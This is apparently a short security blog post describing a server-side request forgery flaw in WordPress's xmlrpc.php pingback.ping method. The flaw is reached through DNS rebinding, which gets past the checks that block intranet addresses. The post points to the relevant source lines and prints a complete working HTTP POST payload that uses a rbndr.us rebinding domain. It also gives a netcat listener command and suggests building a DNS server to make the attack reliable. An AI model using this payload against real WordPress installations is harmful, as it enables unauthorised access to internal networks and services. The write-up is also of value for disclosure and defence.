wordpress xmlrpc.php have ssrf vuln(use dns rebinding bypass limit)

The first is in wp-includes/class-wp-xmlrpc-server.php:6774towp-includes/http.php:551. When the incoming url is a domain name, dns parsing will be performed and determine whether ip belongs to the intranet ip.
Alt text
Alt text

The second is wp-includes/class-http.php:265. The code in wp_http_validate_url is the same as the one in the first screenshot.

Alt text

The last is in wp-includes/Requests/Transport/cURL.php:162
Alt text

So if I provide a domain name which has very short ttl, let the first and second time be resolved to an external network address. Let the third time be resolved into an intranet address。

The details of the payload are as follows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /wordpress/xmlrpc.php HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 338

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://ffffffff.2FF02E9A.rbndr.us:443/xmlrpc.php?hack=ssrf</string></value></param><param><value><string>http://127.0.0.1:8888/wordpress/2019/10/27/hello-world/</string></value></param>
</params>
</methodCall>

ffffffff is the hexadecimal form of the intranet ip 127.0.0.1 and 2FF02E9A is the hexadecimal form of the external network ip。

When dns parsing ffffffff.2FF02E9A.rbndr.us, the server will randomly return 127.0.0.1 or the external network ip
Alt text

Here I have been replaying this package for the convenience of testing. I hope that the dns parsing result of the request is just the external network address, the external network address, and the internal network address.(Need good luck, i I tried thousands of times)
However, in the actual situation, it is entirely possible to build a dns server to accurately return the sequence of the external network address, the external network address, and the internal network address(I am too lazy =.=).

nc -lp 443
Alt text

Alt text

You need to set install_url to use ShareThis. Please set it in _config.yml.
You forgot to set the business or currency_code for Paypal. Please set it in _config.yml.

Comments

You forgot to set the shortname for Disqus. Please set it in _config.yml.